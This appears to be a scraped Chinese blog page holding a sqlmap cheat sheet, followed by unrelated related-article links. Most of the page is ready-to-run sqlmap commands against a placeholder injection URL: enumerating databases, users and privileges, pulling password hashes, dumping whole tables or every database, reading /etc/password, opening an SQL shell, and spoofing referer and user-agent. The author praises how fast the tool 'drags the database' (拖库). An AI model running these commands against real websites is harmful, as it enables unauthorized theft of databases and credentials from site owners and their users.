SQLMAP是一款开源的渗透测试程序,它可以自动探测和利用SQL注入漏洞来获得我们想要的数据。我们可以利用它执行特定的命令、查看文件、获取各种数据;当然,最猥琐的是它利用注入点拖库的速率还是灰常让人满意的。
 
#>  ./sqlmap.py -u “注入地址” -v 1 --dbs   // 列举数据库 
 
#> ./sqlmap.py -u “注入地址” -v 1 --current-db   // 当前数据库
 
#>./sqlmap.py -u “注入地址” -v 1 --users    // 列数据库用户
 
#>  ./sqlmap.py -u “注入地址” -v 1 --current-user  // 当前用户
 
#>  ./sqlmap.py -u “注入地址” -v 1 --tables -D “数据库”   // 列举数据库的表名
 
#> ./sqlmap.py -u “注入地址” -v 1 --columns -T “表名” -D “数据库”   // 获取表的列名
 
#>./sqlmap.py -u “注入地址” -v 1 --dump -C “字段,字段” -T “表名” -D “数据库”   // 获取表中的数据,包含列 
 
已经开始拖库了,SQLMAP是非常人性化的,它会将获取的数据存储sqlmap/output/中、
 
MySQL数据库举例:
 

1) 判断当前用户是否是dba
    python sqlmap.py -u "url" --is-dba -v 1

2) --users:列出数据库管理系统用户
    python sqlmap.py -u "url" --users -v 0

3) --passwords:数据库用户密码(hash)
    python sqlmap.py -u "url" --passwords -v 0
    python sqlmap.py -u "url" --passwords -U sa -v 0

4) 查看用户权限
    python sqlmap.py -u "url" --privileges -v 0
    python sqlmap.py -u "url" --privileges -U postgres -v 0

5) --dbs可以利用的数据库
    python sqlmap.py -u "url" --dbs -v 0

6) --tables列数据库表
    python sqlmap.py -u "url" --tables -D "information_scheam"

-D:指定数据名称

7) --columns 列出表中的列名
    python sqlmap.py -u "url" --columns -T "user" -D "mysql" -v 1

-T:指定表名,-D:指定库名

8) --dump列表中指定列的内容
    python sqlmap.py -u "url" --dump -T "users" -D "testdb"
    -C:可以指定字段

指定列的范围为2到4
python sqlmap.py -u "url" --dump -T "users" -D "testdb"  --start 2 --stop 4 -v 0

9) --dumap-all列出所有数据库,所有表内容
    python sqlmap.py -u "url" --dump-all -v 0

只列出用户自己新建的数据库和表的内容

python sqlmap.py -u "url" --dump-all --exclude-sysdbs -v 0

10) --file读取文件内容[load_file()函数]
      python sqlmap.py -u "url" --file /etc/password

11) 执行SQL
      python sqlmap.py -u "url" --sql-shell

12) -p 指定参数
      python sqlmap.py -u "url" -v 1 -p "id"

-p可以指定多参数-p "cat,id"

13) POST提交
      python sqlmap.py -u "url" --method POST --data "id=1"

14) COOKIE提交
      python sqlmap.py -u "url" --cookie "id=1" -v 1

cookie值可以由TamperData抓取

15) refer欺骗

python sqlmap.py -u "url" --refer "url" -v 3

16) 使用自定义user-agent或者user-agents.txt
      python sqlmap.py -u "url" --user-agent "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" -v 3

python sqlmap.py -u "url" -v 1 -a "./txt/user-agents.txt"

17) 使用多线程猜解
      python sqlmap.py -u "url" -v 1 --current-user --threads 3

18) 指定数据库,绕过SQLMAP的自动检测
      python sqlmap.py -u "url" -v 2 --dbms "PostgreSQL"

19) 指定操作系统绕过SQLMAP自动检测
      python sqlmap.py -u "url" -v 2 --os "Windows"

20) --prefix and --postfix自定义payload
      python sqlmap.py -u "url" -v 3 -p "id" --prefix "'" --postfix "and 'test'='test"

21) union注入测试
      python sqlmap.py -u "url" --union-test -v -1

22) 配合order by
      python sqlmap.py -u "url" --union-test --union-tech orderby -v 1

23) python sqlmap.py -u "url" -v 1 --union-use --banner

24) python sqlmap.py -u "url" -v 5 --union-use --current-user

25) python sqlmap.py -u "url" -v 1 --union-use --dbs

SqlMap之数据库操作语句总结的更多相关文章

  1. (转载)常用的Mysql数据库操作语句大全

    打开CMD,进入数据库命令:mysql -hlocalhost -uroot -p 退出数据库:exit 用户管理: 1.新建用户: >CREATE USER name IDENTIFIED B ...

  2. 数据库操作语句类型(DQL、DML、DDL、DCL)

    数据库操作语句类型(DQL.DML.DDL.DCL)简介 SQL语言共分为四大类:数据查询语言DQL,数据操纵语言DML,数据定义语言DDL,数据控制语言DCL. 1. 数据查询语言DQL 数据查询语 ...

  3. 常用的Mysql数据库操作语句大全

    一.用户管理: 1.新建用户: >CREATE USER name IDENTIFIED BY 'ssapdrow'; 2.更改密码: >SET PASSWORD FOR name=PAS ...

  4. 常用Mysql数据库操作语句

    用户管理: 1.新建用户: 语法msyql>CREATE USER 'username'@'host' IDENTIFIED BY 'password'; 说明: username - 你将创建 ...

  5. mysql数据库操作语句整合

    查看版本:select version();显示当前时间:select now(); 注意:在语句结尾要使用分号; 远程连接 一般在公司开发中,可能会将数据库统一搭建在一台服务器上,所有开发人员共用一 ...

  6. 零、常用的Mysql数据库操作语句大全

    零.用户管理: 1.新建用户: >CREATE USER name IDENTIFIED BY 'ssapdrow'; 2.更改密码: >SET PASSWORD FOR name=PAS ...

  7. 数据库操作语句大全(sql)

    一.基础 1.说明:创建数据库CREATE DATABASE database-name 2.说明:删除数据库drop database dbname3.说明:备份sql server--- 创建 备 ...

  8. MySQL数据库操作语句(cmd环境运行)

    一.开启MySQL服务器 1,  通过windows提供的服务管理器来完成 windows键+R 输入: services.msc 2.在本地服务中打开其服务 3.在DOC命令行下 net stop ...

  9. sql 数据库操作语句 不带select

    MySQL数据操作语句 1.总纲 DDL -数据定义语句** create/drop/alter ** create: 创建 drop:删除 alter:修改 DML -数据操作语句 ** inser ...

随机推荐

  1. ConcurrentHashMap的使用

    http://blog.csdn.net/gjt19910817/article/details/47353909 Long oldValue, newValue; while(true) { old ...

  2. LeetCode解题报告—— Reverse Nodes in k-Group && Sudoku Solver

    1. Reverse Nodes in k-Group Given a linked list, reverse the nodes of a linked list k at a time and ...

  3. Qt笔记——QSqlLite

    静态数据库,简单方便 在.pro文件里添加 +sql #ifndef WIDGET_H #define WIDGET_H #include <QWidget> namespace Ui { ...

  4. docker容器中文件的上传与下载

    原文地址:传送门 1.上传文件 docker cp [OPTIONS] SRC_PATH|- CONTAINER:DEST_PATH [OPTIONS]:保持源目标中的链接,例: docker cp ...

  5. ejs模板在express里的默认文件夹路径修改

    默认的是这句: app.set('view engine','ejs') ===>/views文件夹 我想要变成/websong app.set('views','webosg'); app.s ...

  6. STL模板整理 Binary search(二分查找)

    前言: 之前做题二分都是手动二分造轮子,用起来总是差强人意,后来看到STL才发现前辈们早就把轮子造好了,不得不说比自己手动实现好多了. 常用操作 1.头文件 #include <algorith ...

  7. [putty] ubuntu 通过配置文件设置字体

    创建了一个session之后,就能在 ~/.putty/sessions/ 文件夹下看到session的配置文件了 $ vim ~/.putty/sessions/session-name 搜索Fon ...

  8. 洛谷P1197 [JSOI2008] 星球大战 [并查集]

    题目传送门 星球大战 题目描述 很久以前,在一个遥远的星系,一个黑暗的帝国靠着它的超级武器统治者整个星系. 某一天,凭着一个偶然的机遇,一支反抗军摧毁了帝国的超级武器,并攻下了星系中几乎所有的星球.这 ...

  9. git "Could not read from remote repository.Please make sure you have the correct access rights."解决方案

    我们在使用git clone 或其他命令的时候,有时候会遇到这类问题,如图: fatal: Could not read from remote repository.Please make sure ...

  10. Linux的文件描述符

    (1).文件描述符的定义 文件描述符是内核为了高效管理已被打开的文件所创建的索引,用于指向被打开的文件,所有执行I/O操作的系统调用都通过文件描述符:文件描述符是一个简单的非负整数,用以表明每个被进程 ...